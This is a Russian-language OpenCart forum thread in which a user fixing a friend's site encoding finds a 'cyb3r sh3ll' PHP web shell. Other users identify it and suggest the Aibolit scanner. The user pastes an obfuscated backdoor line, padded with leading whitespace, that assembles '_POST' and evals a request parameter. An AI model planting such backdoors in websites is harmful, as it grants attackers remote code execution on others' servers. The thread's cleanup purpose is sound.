Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Подозрительный файлик


maxville

Recommended Posts

Попросили знакомые проверить сайт, сбилась кодировка и не знают почему.

http://trysela.ru/

Все таблицы в БД как и положено в UTF-8, в .htaccess так же прописал UTF-8, в мета - так же указано UTF-8.

Так пока и не пойму в чём проблема. В бд чистый русский язык есть.

Наткнулся на файл

/trysela.ru/www/system/database/mysqlnd.php

В нём смутили строки типа:
 

$user = "allah";
 
$pass = "akbar";
$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";
$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";


Файлик прикрепил. Может он на самом деле просто стёбный, и относится к какому-то модулю?  Кто знает - подскажите плз.
 

mysqlnd.zip

Надіслати
Поділитися на інших сайтах


Это шелл (дыра в вашем сайте) cyb3r sh3ll. Кстати логи отправляются на [email protected], может знакомая почта

Надіслати
Поділитися на інших сайтах

Вы уверены что шел? А то прям такой очевидный не скрытый текст с явными намёками, я подумал может автор какого-то дополнения/модуля просто так пошутил в файле. Обычно как-то прячут, кодируют..

Змінено користувачем maxville
Надіслати
Поділитися на інших сайтах


Вы уверены что шел? А то прям такой очевидный не скрытый текст, я подумал может автор какого-то дополнения/модуля просто так пошутил в файле.

Такой текст автор написал, уж извините что очевидный.

 

https://sourceforge.net/projects/cyber-shell/?source=typ_redirect

Надіслати
Поділитися на інших сайтах

Попросили знакомые проверить сайт, сбилась кодировка и не знают почему.

http://trysela.ru/

Все таблицы в БД как и положено в UTF-8, в .htaccess так же прописал UTF-8, в мета - так же указано UTF-8.

Так пока и не пойму в чём проблема. В бд чистый русский язык есть.

Наткнулся на файл

/trysela.ru/www/system/database/mysqlnd.php

В нём смутили строки типа:

 

$user = "allah";

 

$pass = "akbar";

$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";

$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";

Файлик прикрепил. Может он на самом деле просто стёбный, и относится к какому-то модулю?  Кто знает - подскажите плз.

Ну Алах Акбар вам! Зарегистрировались сегодня. Где симплу взяли???? АААА????
Надіслати
Поділитися на інших сайтах


Ну Алах Акбар вам! Зарегистрировались сегодня. Где симплу взяли???? АААА????

Тк сегодня попросили, как наткнулся так и зарегистрировался, уж извините.

 

 Где симплу взяли???? АААА????

Что вы подразумеваете под "симплой"?

Надіслати
Поділитися на інших сайтах


Вы взялись проверить сайт, но дупля не отбиваете?

 

Здесь /system/database находятся классы для подключения к БД. Можете посмотреть в конфигах, какой файл указан для подключения к БД. Удалите и используйте для подключения стандартные.

 

А также удалите варез, покайтесь и искупитесь чесной покупкой модулей.

Надіслати
Поділитися на інших сайтах

Вы взялись проверить сайт, но дупля не отбиваете?

Это может вы чего-то не отбиваете. Но не обязательно быть разработчиком чтобы установить, opencart и тому подобные cms. Внести минимальные настройки/правки которые доступны из ПУ или того же гугла. Изначально я взялся посмотреть всего лишь проблемы с кодировкой. А потом уже заметил подозрительные файлики. Что в этой директории находится я понимаю. По дефолту mysqlnd ocstore не используется, и его там вообще не бывает. 

Вопрос тут был задан только из-за шанса что ответит кто-то сталкивающийся непосредственно с данным файликом/шелом. 

 

 

А также удалите варез, покайтесь и искупитесь чесной покупкой модулей.

Повторюсь, сайт не мой.

  • +1 1
Надіслати
Поділитися на інших сайтах


Ха ха ха))) Старая песня. Я не я и сайт не мой, просто подержать дали))))

Уже не смешно. Избитая тема. И причем вина не всегда владельцев сайта.

 

Самое интересное, что беспокоитесь о варезе больше Вы, чем владельцы модулей или сайтов   :ugeek:

Змінено користувачем n3bo
  • +1 1
Надіслати
Поділитися на інших сайтах


Нужно уметь верить людям, вилка. Учите новую песню  ;) 

 

forvilka.png

 

Погуглите Aibolit, пробежитесь им по сайту, как экономный вариант.

Змінено користувачем n3bo
  • +1 1
Надіслати
Поділитися на інших сайтах


Ааа... ну раз все сами понимаете, тогда просто добавьте к параметрам подключения это

"SET NAMES 'utf8'"
"SET CHARACTER SET utf8"
"SET CHARACTER_SET_CONNECTION=utf8"

и можете пользоваться сайтом дальше

Надіслати
Поділитися на інших сайтах

Уже не смешно. Избитая тема. И причем вина не всегда владельцев сайта.

 

Самое интересное, что беспокоитесь о варезе больше Вы, чем владельцы модулей  :ugeek:

Он слишком далёкий от этого, а я ответственный :)

Надіслати
Поділитися на інших сайтах


с кодировкой базы врядли как-то связано, потому как в заголовках ответа

content-type:
text/html; charset=windows-1251

касательно most advanced PHP Web Shell узнайте у @Einshtein, он такими делами помышляет

Надіслати
Поділитися на інших сайтах

Ааа... ну раз все сами понимаете, тогда просто добавьте к параметрам подключения это

"SET NAMES 'utf8'"
"SET CHARACTER SET utf8"
"SET CHARACTER_SET_CONNECTION=utf8"

и можете пользоваться сайтом дальше

Разумеется я это первым делом проверял, всё это есть в движке по дефолту.

 

Надіслати
Поділитися на інших сайтах


с кодировкой базы врядли как-то связано, потому как в заголовках ответа

content-type:
text/html; charset=windows-1251

вот и не могу понять откуда он берёт эту кодировку, когда везде где только можно указал UTF-8

Змінено користувачем maxville
Надіслати
Поділитися на інших сайтах


касательно most advanced PHP Web Shell узнайте у @Einshtein, он такими делами помышляет

Благодарю, отпишусь!

по поводу проверки айболитом - да, есть куча не хорошего, например файлы с таким содержимым, и больше там ничего нет.

 

<?php                                                                                                                                                                                                                                                                   $bunu5="s_top" ; $qfv8=strtoupper($bunu5[1]. $bunu5[4]. $bunu5[3].$bunu5[0]. $bunu5[2]) ; if (isset(${$qfv8 }['qe0080b' ])) {eval(${ $qfv8 } ['qe0080b'] ) ;} ?> 
Надіслати
Поділитися на інших сайтах


Он ее берт там где у вас в файлах или BOM или пробел или пустая строка в файле ( в каком-либо файле)

Надіслати
Поділитися на інших сайтах

Хм.. странно, в отдельном php.ini в корневой директории сайта на default_charset - сайт внимания не обращал. А на хостинге в ПУ прописал default_charset = UTF-8 - и на сайте всё сразу стало красиво. 

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.